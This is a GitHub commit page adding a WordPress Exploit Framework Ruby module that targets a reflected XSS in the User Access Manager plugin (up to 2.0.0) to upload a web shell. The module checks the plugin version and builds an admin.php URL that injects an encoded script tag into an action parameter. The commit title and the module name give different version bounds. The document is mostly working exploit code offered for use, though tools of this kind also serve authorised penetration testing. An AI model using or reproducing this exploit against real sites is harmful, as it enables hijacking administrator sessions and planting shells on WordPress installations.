Skip to content
This repository was archived by the owner on Oct 22, 2020. It is now read-only.

Commit 0fb39e2

Browse files
rastatingrastating
committed
Land #38 - Add User Access Manager <= 1.2.9 reflected XSS shell upload
2 parents a2e9ccf + b594935 commit 0fb39e2

File tree

1 file changed

+33
-0
lines changed

1 file changed

+33
-0
lines changed

modules/exploits/user_access_manager_reflected_xss_shell_upload.rb

Lines changed: 33 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,33 @@
1+
class Wpxf::Exploit::UserAccessManagerReflectedXssShellUpload < Wpxf::Module
2+
include Wpxf::WordPress::ReflectedXss
3+
4+
def initialize
5+
super
6+
7+
update_info(
8+
name: 'User Access Manager <= 2.0.0 Reflected XSS Shell Upload',
9+
author: [
10+
'DefenseCode <www.defensecode.com>', # Dislosure
11+
'Paul Williams <phyushin[at]phyubox.com>' # WPXF module
12+
],
13+
references: [
14+
['WPVDB', '8814'],
15+
['URL', 'http://www.defensecode.com/advisories/DC-2017-01-021_WordPress_User_Access_Manager_Plugin_Advisory.pdf'],
16+
['URL', 'http://seclists.org/bugtraq/2017/May/31']
17+
],
18+
date: 'May 11 2017'
19+
)
20+
end
21+
22+
def check
23+
check_plugin_version_from_readme('user-access-manager', '2.0.0')
24+
end
25+
26+
def vulnerable_url
27+
normalize_uri(wordpress_url_admin, 'admin.php')
28+
end
29+
30+
def url_with_xss
31+
"#{vulnerable_url}?page=uam_usergroup&action=editGroup&id=%5C%22%3E%3Cscript%3E#{xss_url_and_ascii_encoded_include_script}%3C%2Fscript%3E"
32+
end
33+
end

0 commit comments

Comments
 (0)